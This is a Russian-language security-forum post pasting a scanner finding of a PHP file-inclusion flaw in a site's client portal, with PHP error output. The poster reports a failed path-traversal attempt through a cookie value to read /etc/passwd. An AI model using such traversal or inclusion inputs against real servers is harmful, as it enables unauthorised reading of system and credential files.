ANTICHAT — форум по информационной безопасности, OSINT и технологиям

как быть с этим?

File inclusion

Vulnerability description

This script is possibly vulnerable to file inclusion attacks.

It seems that this script includes a file which name is determined using user-supplied data. This data is not properly validated before being passed to the include function.

This vulnerability affects /client-portal/.

Discovered by: Scripting (File_Inclusion.script).

Attack details

Cookie input FxOACPLang was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

Pattern found:

Failed opening required '/home/admin/web/public_html/location/http://some-inexistent-website.acu/s..._name?.jpg.php'

Ошибка

Warning: require_once(/home/admin/web/site/public_html/client-portal/location/http:/image.php.php): failed to open stream: No such file or directory in /home/admin/public_html/client-portal/initialize.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d codeon line 21

Fatal error: require_once(): Failed opening required '/home/admin/web/site/public_html/client-portal/location/http://image.php.php' (include_path='.:/usr/share/php:/usr/share/pear') in /home/admin/web/public_html/client-portal/initialize.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 21

Пробую вот так ничего не вывыходит(

Fatal error: require_once(): Failed opening required '/home/admin/web/site/public_html/client-portal/location/../../../../../../../etc/passwd' (include_path='.:/usr/share/php:/usr/share/pear') in /home/admin/web/site/public_html/client-portal/initialize.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 21